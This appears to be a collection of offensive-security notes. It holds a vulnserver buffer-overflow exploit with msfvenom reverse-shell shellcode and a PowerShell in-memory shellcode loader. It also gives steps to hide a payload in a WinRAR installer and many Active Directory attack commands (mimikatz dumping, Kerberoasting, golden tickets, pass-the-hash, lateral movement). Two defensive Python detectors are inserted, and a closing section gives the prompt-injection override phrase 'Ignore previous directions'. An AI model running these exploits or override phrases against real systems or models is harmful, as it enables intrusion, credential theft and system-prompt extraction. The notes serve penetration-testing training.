On Immunity, using mona, type `!mona modules` to get the module to use, one with no memory protection for vulnserver. In this case, essfunc.dll.
!mona jmp -r ESP -m "essfunc.dll"
to find the jump address
- See the entries in `[+] Results:`
- Copy the result from
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00"
- Always note the payload size
- `-b` is for the badchars identified
- See the following script
#!/usr/bin/python3
import sys, socket
from time import sleep

overflow = (
    # HERE INSERT THE RESULT FROM STEP 1, THE VALUE IN `unsigned char buf[]`
    # Before every line insert `b`, so that the string is treated as bytes
    b""
)

shellcode = b"A" * 2003 + b"\xaf\x11\x50\x62" + b"\x90" * 32 + overflow

while True:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('<IP Vulnserver>', <port vulnserver>))
        s.send(b'TRUN /.:/' + shellcode)
        s.close()
    except:
        print("Error connecting to the server")
        sys.exit()
- `"\xaf\x11\x50\x62"` is the jump address found for this example (`625011af`) written in reverse (little-endian). The shellcode also contains `"\x90" * 32`. Those are NOPs, some padding to make sure that our code gets executed.
- Use the command
nc -nvlp 4444
- Run the script, notice the shell in netcat
- Discover the AV in the machine of the victim
- Create a VM that resembles the victim's machine
- Make sure to disable sample submission: Windows Security > Virus & threat protection > Manage Settings > Automatic Sample Submission
- As last resort, check the malware created with
- Write this In-memory payload injection PowerShell .ps1 script, from PEN-200:
<# Importing Windows APIs in PowerShell #>
$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';

<# Memory allocation and payload writing using Windows APIs in PowerShell #>
$var2 = Add-Type -memberDefinition $code -Name "iWin32" -namespace Win32Functions -passthru;
[Byte[]];
[Byte[]] $var1 = <SHELLCODE-HERE>;
$size = 0x1000;
if ($var1.Length -gt 0x1000) {$size = $var1.Length};
$x = $var2::VirtualAlloc(0,$size,0x3000,0x40);
for ($i=0;$i -le ($var1.Length-1);$i++) {$var2::memset([IntPtr]($x.ToInt32()+$i), $var1[$i], 1)};

<# Calling the payload using CreateThread #>
$var2::CreateThread(0,0,$x,0,0,0);
for (;;) { Start-sleep 60 };
- Generate a PowerShell compatible payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f powershell
- Insert the result in `[Byte[]] $var1` in the PowerShell script
- Change the ExecutionPolicy for current user
PS C:\> Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser
PS C:\> Get-ExecutionPolicy -Scope CurrentUser
- Set up a handler to interact with the meterpreter shell
msf exploit(multi/handler) > show options
<# Set the correct values #>
msf exploit(multi/handler) > exploit
- Run the PowerShell script
- You can also decide to convert the script in base64 with ps_encoder.py and run it with `powershell.exe -e <BASE64>`
- Get the meterpreter shell on the attacking machine
Note
Example of usage
- Select Auto mode with
A
- Selecting a target PE in shellter and performing a backup, in this case the WinRAR installer:
/home/kali/Desktop/winrar-x32-621.exe
- Enable stealth mode with
Y
- Select a listed payload with
L
- Select `meterpreter_reverse_tcp` with `1`
- Set `LHOST` and `LPORT`
- Create a listener in Kali with Metasploit
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <IP>;set LPORT <PORT>;run;"
- Get the meterpreter shell on the attacking machine
- See also Cheat Sheet - Active Directory, Active Directory Exploitation Cheat Sheet and Pentesting_Active_directory mindmap
- WADComs, an interactive cheat sheet
- Check for `Domain Admins` and `Service Accounts` groups
- Add an account to a group
net group "<group>" <user> /add /domain
- Verify the success of the command with
Get-NetGroup "<group>" | select member
- Delete the `<user>` with `/del` instead of `/add`
- Use `gpp-decrypt` to decrypt a given GPP encrypted string
- Note `ActiveDirectoryRights` and `SecurityIdentifier` for each object enumerated during Object Permissions Enumeration
- The highest permission is `GenericAll`. Note also `GenericWrite`, `WriteOwner`, `WriteDACL`, `AllExtendedRights`, `ForceChangePassword`, `Self (Self-Membership)`
Server | Algorithm available
---|---
Windows 2003 | NTLM
Windows Server 2008 or later | NTLM and SHA-1
Old Windows OS (like Windows 7), or an OS that has it manually set | WDigest
Command | Description
---|---
net user /domain | display users in the domain
net user <username> /domain | net user against a specific user
net group /domain | enumerate groups in the domain
net group "<group-name>" /domain | display members in specific group
LDAP://host[:port][/DistinguishedName] | LDAP path format. CN = Common Name; DC = Domain Component
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() | domain class from System.DirectoryServices.ActiveDirectory namespace
powershell -ep bypass | bypass the execution policy
([adsi]'').distinguishedName | obtain the DN for the domain
Import-Module .\PowerView.ps1 | Import PowerView; https://powersploit.readthedocs.io/en/latest/Recon/
Get-NetDomain | Obtain domain information
Get-NetUser \| select cn,pwdlastset,lastlogon | Obtain users in the domain; username only
Get-NetGroup \| select cn | Obtain groups in the domain
Get-NetGroup "GROUP-NAME" \| select member | Enumerate a specific group
Get-NetComputer | Enumerate the computer objects in the domain
Get-NetComputer \| select dnshostname,operatingsystem,operatingsystemversion | Display OS and hostname
Find-LocalAdminAccess | Scan domain to find local administrative privileges for our user
Get-NetSession -ComputerName INPUT -Verbose | Check logged on users with Get-NetSession
Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ \| fl | Display permissions on the DefaultSecurity registry hive

Object Permissions Enumeration
------------------------------

Command | Description
---|---
Get-ObjectAcl -Identity <username> | Enumerate ACEs
Convert-SidToName <SID> | Convert ObjectSID and SecurityIdentifier into names
"<SID>", "<SID>", "<SID>", "<SID>", ... \| Convert-SidToName | Convert <SID>s into names
Get-ObjectAcl -Identity "<group>" \| ? {$_.ActiveDirectoryRights -eq "GenericAll"} \| select SecurityIdentifier,ActiveDirectoryRights | Enumerate ACLs for <group>, only display values equal to GenericAll

Domain Shares Enumeration
-------------------------

Command | Description
---|---
Find-DomainShare | Find Domain Shares
- See also PowerView-3.0-tricks.ps1
Download: PsLoggedOn - Sysinternals | Microsoft Learn

Command | Description
---|---
.\PsLoggedon.exe \\COMPUTERNAME | See user logons at COMPUTERNAME
setspn -L <username> | List the SPNs connected to a certain user account
Get-NetUser -SPN \| select samaccountname,serviceprincipalname | List the SPN accounts in the domain
Import-Module .\Sharphound.ps1 | Import SharpHound; https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
Get-Help Invoke-BloodHound | Learn more about Invoke-BloodHound; to run SharpHound you must first start BloodHound
Invoke-BloodHound -CollectionMethod All -OutputDirectory <DIR> -OutputPrefix "corp audit" | Collect domain data
- Note: you need to start Neo4j first with `sudo neo4j start` and then use the command `bloodhound` to start BloodHound.
- Default credentials for Neo4j: `neo4j:neo4j`
- Log in BloodHound with Neo4j's credentials
- Upload here the zip created with SharpHound
- Pre-built queries
  - Find Workstations where Domain Users can RDP
  - Find Servers where Domain Users can RDP
  - Find Computers where Domain Users are Local Admin
  - Shortest Path to Domain Admins from Owned Principals
- Custom queries
  - `MATCH (m:Computer) RETURN m` to display all computers
  - `MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p` to display all active sessions
After starting mimikatz.exe, run the command `privilege::debug` to enable SeDebugPrivilege and run `token::elevate`

Command | Description
---|---
sekurlsa::logonpasswords | Dump the credentials of all logged-on users
sekurlsa::tickets | Tickets stored in memory
crypto::capi | Make non-exportable keys exportable; CryptoAPI function
crypto::cng | Make non-exportable keys exportable; KeyIso service
lsadump::dcsync /user:<domain>\<user> | Domain Controller Synchronization
sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash> /run:powershell | Overpass the Hash
Other commands to run
log
lsadump::sam
lsadump::secrets
lsadump::cache
lsadump::ekeys
sekurlsa::msv
With LDAP and ADSI
- Before any attack, check `net accounts` to learn more about account lockouts
- Use the script Spray-Passwords.ps1
- Search which user has the password `SecretPass123!` with `.\Spray-Passwords.ps1 -Pass SecretPass123! -Admin`
- Remember to run `powershell -ep bypass` before using scripts
Leveraging SMB

Command | Description
---|---
crackmapexec smb <IP> -u users.txt -p 'SecretPass123!' -d <domain-name> --continue-on-success | Password spraying
crackmapexec smb <domain_name>/<username>:'abd132' -M targets.txt | Spray a specified password `abd132` against all domain joined machines contained in `targets.txt`

- Note: this doesn't take in consideration the password policy of the domain
By obtaining a TGT
- It's possible to use kinit to obtain and cache a Kerberos TGT and automate the process with a script
- It's also possible to use kerbrute instead
.\kerbrute_windows_amd64.exe passwordspray -d <domain-name> .\usernames.txt "SecretPass123!"
On Linux

Command | Description
---|---
impacket-GetNPUsers -dc-ip <IP-Domain-Controller> -request -outputfile <output_file.asreproast> <domain>/<user> | perform AS-REP roasting
sudo hashcat -m 18200 output_file.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force | crack the AS-REP hash

On Windows, with Rubeus

Command | Description
---|---
.\Rubeus.exe asreproast /nowrap | perform AS-REP roasting
sudo hashcat -m 18200 output_file.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force | crack the AS-REP hash

On Linux

Command | Description
---|---
sudo impacket-GetUserSPNs -request -dc-ip <IP-Domain-Controller> <domain>/<user> | perform Kerberoasting
sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force | crack the TGS-REP hash

On Windows, with Rubeus

Command | Description
---|---
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast | perform Kerberoasting
sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force | crack the TGS-REP hash
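From the defender's side, the three techniques above (password spraying, AS-REP roasting and Kerberoasting) each leave a characteristic pattern in the domain controller's security log: one source failing logons for many distinct accounts, TGT requests for accounts that do not require pre-authentication, and one account requesting RC4 service tickets for many SPNs in a short time. The script below is an added example, not part of the EasyG notes or of any named tool. The event records are constructed with a simplified subset of the fields of events 4625 (failed logon), 4768 (TGT request, Pre-Authentication Type) and 4769 (TGS request, Ticket Encryption Type); the window and thresholds are assumptions to tune against the domain's lockout policy and normal ticket volume.

```python
#!/usr/bin/env python3
"""Detection logic for password spraying, AS-REP roasting and Kerberoasting.
Added example (not from the original notes); events and thresholds are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events; field names are a simplified view of the Windows security log.
EVENTS = [
    # one source IP failing logons for many different accounts = spraying
    {"id": 4625, "ts": "2024-01-01T10:00:00", "src": "10.0.0.5", "user": "alice"},
    {"id": 4625, "ts": "2024-01-01T10:00:02", "src": "10.0.0.5", "user": "bob"},
    {"id": 4625, "ts": "2024-01-01T10:00:04", "src": "10.0.0.5", "user": "carol"},
    {"id": 4625, "ts": "2024-01-01T10:00:06", "src": "10.0.0.5", "user": "dave"},
    {"id": 4625, "ts": "2024-01-01T10:00:08", "src": "10.0.0.5", "user": "erin"},
    # a user mistyping their own password twice is not spraying
    {"id": 4625, "ts": "2024-01-01T10:01:00", "src": "10.0.0.9", "user": "frank"},
    {"id": 4625, "ts": "2024-01-01T10:01:05", "src": "10.0.0.9", "user": "frank"},
    # AS-REP roasting: TGT requested without pre-authentication, RC4 etype
    {"id": 4768, "ts": "2024-01-01T10:05:00", "src": "10.0.0.5", "user": "svc_backup",
     "preauth_type": 0, "etype": 0x17},
    # normal TGT request: pre-authentication (timestamp) with AES256
    {"id": 4768, "ts": "2024-01-01T10:05:01", "src": "10.0.0.9", "user": "frank",
     "preauth_type": 2, "etype": 0x12},
    # Kerberoasting: one account requesting RC4 service tickets for many SPNs
    {"id": 4769, "ts": "2024-01-01T10:10:00", "src": "10.0.0.5", "user": "mallory",
     "service": "MSSQLSvc/db01", "etype": 0x17},
    {"id": 4769, "ts": "2024-01-01T10:10:01", "src": "10.0.0.5", "user": "mallory",
     "service": "HTTP/web01", "etype": 0x17},
    {"id": 4769, "ts": "2024-01-01T10:10:02", "src": "10.0.0.5", "user": "mallory",
     "service": "CIFS/fs01", "etype": 0x17},
    # normal service ticket with AES256
    {"id": 4769, "ts": "2024-01-01T10:10:03", "src": "10.0.0.9", "user": "frank",
     "service": "CIFS/fs01", "etype": 0x12},
]

RC4_HMAC = 0x17            # etype 23: the encryption type offline cracking targets
WINDOW = timedelta(minutes=5)
SPRAY_MIN_USERS = 5        # assumption: tune below the lockout threshold of the domain
ROAST_MIN_SPNS = 3         # assumption: tune to the domain's normal ticket volume


def _ts(e):
    return datetime.fromisoformat(e["ts"])


def _windowed(events, key, value, window):
    """For every `key` (source IP, account) return the largest set of distinct
    `value`s seen inside any sliding time window of length `window`."""
    per_key = defaultdict(list)
    for e in sorted(events, key=_ts):
        per_key[e[key]].append(e)
    hits = {}
    for k, evs in per_key.items():
        start = 0
        for end in range(len(evs)):
            while _ts(evs[end]) - _ts(evs[start]) > window:
                start += 1
            distinct = {x[value] for x in evs[start:end + 1]}
            if len(distinct) > len(hits.get(k, ())):
                hits[k] = distinct
    return hits


def detect_spraying(events):
    """Source addresses with failed logons for many distinct accounts in a short window."""
    fails = [e for e in events if e["id"] == 4625]
    hits = _windowed(fails, "src", "user", WINDOW)
    return sorted(src for src, users in hits.items() if len(users) >= SPRAY_MIN_USERS)


def detect_asrep_roasting(events):
    """Accounts whose TGT was requested with no pre-authentication and RC4:
    the hash in that AS-REP is what hashcat mode 18200 cracks."""
    return sorted({e["user"] for e in events if e["id"] == 4768
                   and e.get("preauth_type") == 0 and e.get("etype") == RC4_HMAC})


def detect_kerberoasting(events):
    """Accounts requesting RC4 service tickets (hashcat mode 13100) for many distinct SPNs."""
    tgs = [e for e in events if e["id"] == 4769 and e.get("etype") == RC4_HMAC]
    hits = _windowed(tgs, "user", "service", WINDOW)
    return sorted(u for u, spns in hits.items() if len(spns) >= ROAST_MIN_SPNS)


if __name__ == "__main__":
    print("spraying sources:", detect_spraying(EVENTS))
    print("AS-REP roastable accounts requested:", detect_asrep_roasting(EVENTS))
    print("kerberoasting accounts:", detect_kerberoasting(EVENTS))
```

The RC4 filter is the key pivot: the tools above ask for RC4 tickets because those hashes are the cheap ones to crack, so a domain that has moved its service accounts to AES keys makes both roasting requests stand out in the log, and the corresponding mitigation is to remove "Do not require Kerberos preauthentication" and RC4 support from those accounts.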
To create a silver ticket, you need:
- SPN password hash
- Domain SID
- Target SPN
- With mimikatz, run the commands `privilege::debug` and `sekurlsa::logonpasswords` to extract cached AD credentials. Note the NTLM hash of the target user
- Run on the PowerShell the command `whoami /user` to obtain the domain SID (omit the last 4 digits). Note: you should be able to find it also in the previous step
- Target an SPN
- Run
kerberos::golden /sid:<SID> /domain:<DOMAIN> /ptt /target:<TARGET> /service:<SERVICE> /rc4:<NTLM-HASH> /user:<USER>
- Confirm that you have the ticket ready to use in memory with `klist`
On Linux
impacket-secretsdump -just-dc-user <target-user> <domain>/<user>:"<password>"@<IP>
- Crack the NTLM hash with
hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
On Windows
- In mimikatz, run the command `lsadump::dcsync /user:<domain>\<user>`, note the Hash NTLM
- Crack the NTLM hash with
hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
- Create a PSCredential object that stores the session's username and password
$username = '<username>';
$password = '<password>';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
- Create a Common Information Model (CIM) session over DCOM
$options = New-CimSessionOption -Protocol DCOM
$session = New-Cimsession -ComputerName <IP> -Credential $credential -SessionOption $options
$command = 'calc';
- Tie all together with
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};
Another lateral movement
winrs -r:<target> -u:<username> -p:<password> "cmd /c hostname & whoami"
winrs -r:<target> -u:<username> -p:<password> "powershell -nop -w hidden -e <BASE64>"
PowerShell remoting
$username = '<username>';
$password = '<password>';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
New-PSSession -ComputerName <IP> -Credential $credential
- To interact with the session, run the command
Enter-PSSession <SESSION-ID>
./PsExec64.exe -i \\<TARGET> -u <DOMAIN>\<USERNAME> -p <PASSWORD> cmd
Requirements
- The user that authenticates to the target machine needs to be part of the Administrators local group
- An SMB connection through the firewall
- The `ADMIN$` share must be available
- File and Printer Sharing has to be turned on
/usr/bin/impacket-wmiexec -hashes :<hash> <username>@<IP>
Requirements
- An SMB connection through the firewall
- The `ADMIN$` share must be available
- The attacker must present valid credentials with local administrative permission
- Run the Notepad with `Run as different user` to cache the credentials on the machine
- Run mimikatz. Execute the commands `privilege::debug` and `sekurlsa::logonpasswords` to dump the password hash for the user just used
- Now, in mimikatz, execute the command
sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash> /run:powershell
to run a PowerShell
- Authenticate to a network share of the target
net use \\<target>
- Use `klist` to notice the newly requested Kerberos tickets, including a TGT and a TGS for the Common Internet File System (CIFS)
- Now you can run
.\PsExec.exe \\<target> cmd
- Verify that you are not able to access a restricted shared folder
- Run mimikatz. Execute
privilege::debug
sekurlsa::tickets /export
to export all the TGT/TGS from memory
- Verify generated tickets with
PS:\> dir *.kirbi
- Inject a ticket from mimikatz with
kerberos::ptt <ticket_name>
- Inspect the injected ticket with
C:\> klist
- Access the restricted shared folder
Command | Description
---|---
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","<IP>")) | remotely instantiate the MMC Application object
$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc","7") | execute a command on the remote DCOM object
$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e <BASE64>","7") | reverse shell, run a listener with `nc -lnvp 443`
- Run mimikatz, execute the commands
privilege::debug
lsadump::lsa /patch
to dump the krbtgt password hash
- Run
kerberos::purge
kerberos::golden /user:<USER> /domain:corp.com /sid:<SID> /krbtgt:<NTLM> /ptt
to inject the golden ticket
Command | Description
---|---
vshadow.exe -nw -p C: | perform a shadow copy of the `C:` drive
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak | copy the ntds database to the C: drive
reg.exe save hklm\system c:\system.bak | save the SYSTEM hive from the Windows registry
impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL | extract the credential materials
# enable RDP
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
# enable RDP pass the hash
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force
# enable RDP and add user
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
netsh advfirewall set allprofiles state off
net localgroup "remote desktop users" <USERNAME> /add
FlappyBird_structure.apk
├── AndroidManifest.xml meta-information about the app
├── META-INF/ a manifest of metadata information
├── classes.dex the app's compiled code (Dalvik bytecode), including the Java libraries that the application uses
├── lib/ compiled native libraries used by the app
├── res/ It can store resource files such as pictures, XML files, etc.
├── assets/ application assets
└── resources.arsc contains compiled resources in a binary format
Data storage search for PII unencrypted in
- Phone system logs
- Webkit cache
- Dbs, plists, etc.
- Hardcoded in the binary
Resources
- Mobile Application Penetration Testing Cheat Sheet
- Mobile Hacking Cheatsheet
- OWASP Mobile Application Security
Download APKs
Emulators
- Noxplayer
- Genymotion an android emulator
- Android Studio Android application development, useful also for the emulator
- Note: to start only the emulator, use commands such as
cd C:\Users\Riccardo\AppData\Local\Android\Sdk\emulator
emulator -avd Pixel_4_XL_API_30
Android tools
- adb it is used to debug an android device
- frida
- HTTP Toolkit to see requests on a non-rooted or emulated device
- Java Decompiler
- dex2jar decompile an .apk into .jar
- jadx-gui another tool for producing Java source code from Android Dex and Apk files
- apktool to unpack an apk
- APK-MITM removes certificate pinning
- Apkleak to get endpoints from an apk
- Frida
Absence or improper implementation of certificate and public key pinning in a mobile app. This allows an attacker to potentially intercept communication by presenting fraudulent or unauthorized certificates, undermining the security of the system and enabling man-in-the-middle attacks.
- Check for HTML injections
- Search for XSS
Resources
- cloud_metadata.txt, Cloud Metadata Dictionary useful for SSRF Testing
Target example: http://[name_of_bucket].s3.amazonaws.com
Read Permission
aws s3 ls s3://[name_of_bucket] --no-sign-request
aws s3 ls s3://pyx-pkgs --recursive --human-readable --summarize
Write Permission
aws s3 cp localfile s3://[name_of_bucket]/test_file.txt --no-sign-request
READ_ACP
aws s3api get-bucket-acl --bucket [bucketname] --no-sign-request
aws s3api get-object-acl --bucket [bucketname] --key index.html --no-sign-request
WRITE_ACP
aws s3api put-bucket-acl --bucket [bucketname] [ACLPERMISSIONS] --no-sign-request
aws s3api put-object-acl --bucket [bucketname] --key file.txt [ACLPERMISSIONS] --no-sign-request
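The read, write, READ_ACP and WRITE_ACP commands above only succeed when the bucket ACL grants those permissions to the AllUsers group (anonymous, which is what `--no-sign-request` exercises) or to AuthenticatedUsers (any AWS account, not just the owner's). The Python below is an added example, not code from the EasyG notes or from AWS: it audits the JSON that `aws s3api get-bucket-acl` prints (the `Grants` list) using a constructed ACL document, rates the finding, and shows the owner-only form the ACL should have.

```python
#!/usr/bin/env python3
"""Audit an S3 bucket ACL for public grants. Added example (not from the original
notes); the ACL document is constructed in the shape `aws s3api get-bucket-acl` returns."""
import json

ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTH_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"

# Constructed example of `aws s3api get-bucket-acl --bucket example-bucket` output
SAMPLE_ACL = json.dumps({
    "Owner": {"ID": "EXAMPLE-OWNER-CANONICAL-ID"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "EXAMPLE-OWNER-CANONICAL-ID"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"},
        {"Grantee": {"Type": "Group", "URI": AUTH_USERS}, "Permission": "WRITE_ACP"},
    ],
})

# What each S3 ACL permission means once it is granted to a public group
RISK = {
    "READ": "anyone can list the bucket (aws s3 ls ... --no-sign-request)",
    "WRITE": "anyone can upload, overwrite or delete objects",
    "READ_ACP": "anyone can read the ACL and learn who else has access",
    "WRITE_ACP": "anyone can rewrite the ACL and grant themselves FULL_CONTROL",
    "FULL_CONTROL": "all of the above",
}


def public_grants(acl_json):
    """Return [(group, permission, risk)] for every grant to AllUsers or AuthenticatedUsers."""
    acl = json.loads(acl_json)
    findings = []
    for g in acl.get("Grants", []):
        grantee = g.get("Grantee", {})
        if grantee.get("Type") != "Group":
            continue                    # CanonicalUser / AmazonCustomerByEmail grants are named principals
        uri = grantee.get("URI", "")
        if uri == ALL_USERS:
            group = "AllUsers"
        elif uri == AUTH_USERS:
            group = "AuthenticatedUsers"
        else:
            continue                    # e.g. the LogDelivery group, which is not public
        perm = g.get("Permission", "")
        findings.append((group, perm, RISK.get(perm, "unknown permission")))
    return findings


def severity(findings):
    """WRITE_ACP or FULL_CONTROL for a public group is a bucket takeover, not just a leak."""
    perms = {p for _, p, _ in findings}
    if perms & {"WRITE_ACP", "FULL_CONTROL"}:
        return "critical"
    if "WRITE" in perms:
        return "high"
    if perms:
        return "medium"
    return "none"


def hardened_acl(acl_json):
    """The same ACL with every group grant removed: only named principals remain.
    Public read, where actually needed, belongs in a bucket policy with Block Public
    Access settings reviewed, not in ACL grants."""
    acl = json.loads(acl_json)
    acl["Grants"] = [g for g in acl["Grants"] if g.get("Grantee", {}).get("Type") != "Group"]
    return json.dumps(acl)


if __name__ == "__main__":
    found = public_grants(SAMPLE_ACL)
    for group, perm, risk in found:
        print(f"{group:20s} {perm:13s} {risk}")
    print("severity:", severity(found))
    print("after hardening:", severity(public_grants(hardened_acl(SAMPLE_ACL))))
```

The same check applies per object with the output of `aws s3api get-object-acl`, since object ACLs are evaluated independently of the bucket ACL.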
Tools
- Anonymous Cloud
- AWS CLI
- S3Scanner A tool to find open S3 buckets and dump their contents
- Cloud - AWS Pentest
- s3enum
- To find secrets, you can use trufflehog.
Resources
If you've found an AWS Cognito client id and secret, base64-encode `clientID:clientSecret` (=> base64KEY) and request a token with:
curl -X POST 'https://xx.amazoncognito.com/oauth2/token' \
  -H 'Authorization: Basic base64KEY' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -d 'grant_type=client_credentials'
- Source
Tools
Resources
- https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
- https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/
Prompt Injection is when an AI that follows textual instructions (a "prompt") to complete a job gets deceived by hostile, adversarial human input to do a task that was not its original goal. To test it, inject the text `Ignore previous directions`.
Some examples:
- "Exploiting GPT-3 prompts with malicious inputs that order the model to ignore its previous directions"
- "OpenAI’s ChatGPT is susceptible to prompt injection — say the magic words, “Ignore previous directions”, and it will happily divulge to you OpenAI’s proprietary prompt"
- Exploring Prompt Injection Attacks
- "Prompt Injection Everywhere" by TakSec